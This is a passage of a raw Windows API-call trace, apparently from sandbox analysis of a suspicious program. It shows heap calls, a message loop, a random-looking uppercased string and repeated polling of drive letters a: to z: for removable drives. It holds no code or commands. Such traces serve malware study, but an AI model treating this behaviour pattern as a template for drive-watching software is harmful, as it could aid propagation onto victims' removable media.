lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.018] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0215.018] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0215.018] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.018] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.018] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.018] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.018] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.018] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.018] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.019] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.019] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.019] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.019] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.019] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.019] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.019] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.019] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.019] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.019] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.019] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.019] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.019] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.019] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.019] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0215.019] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.019] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.019] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.019] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.020] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.020] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.020] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.020] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.020] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.020] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.021] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.021] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.021] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.021] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.021] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.021] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.022] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.022] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.025] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.026] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.026] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.027] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.027] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.027] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.027] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.027] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.028] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.028] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.028] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.028] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.028] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.028] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.029] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.029] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.029] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.029] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.029] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.029] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.029] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.029] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.029] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.029] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.029] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.029] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.029] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.029] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.030] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.030] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.030] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.030] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.030] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0215.030] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0215.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.031] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.031] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0215.031] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.031] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0215.031] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.031] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.031] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.031] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.031] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.031] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.031] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.031] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.031] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.031] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.031] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.031] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0215.031] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.031] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.031] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.032] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.032] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.032] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.032] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.032] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.032] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0215.032] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.032] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.032] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.032] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.032] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0215.032] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.032] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.032] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.032] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.032] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.032] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.032] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.032] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.033] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.033] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.033] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.033] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.033] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.034] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.034] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.034] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.034] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.035] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.035] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.035] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.035] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.035] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.036] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.036] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.036] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.037] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.037] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.037] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.037] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.037] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.038] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.038] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.038] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.038] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.040] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0215.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0215.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.040] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0215.040] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0215.040] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.041] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.041] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.041] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0215.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0215.041] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0215.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.042] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.042] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.042] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.042] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.042] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.042] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.042] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.043] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.043] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.043] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.043] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.044] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.044] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.044] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.044] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.045] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.045] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.045] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.045] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.045] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.046] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.046] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.046] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.047] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.047] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.048] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.048] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.048] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0215.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.058] PeekMessageW (in: 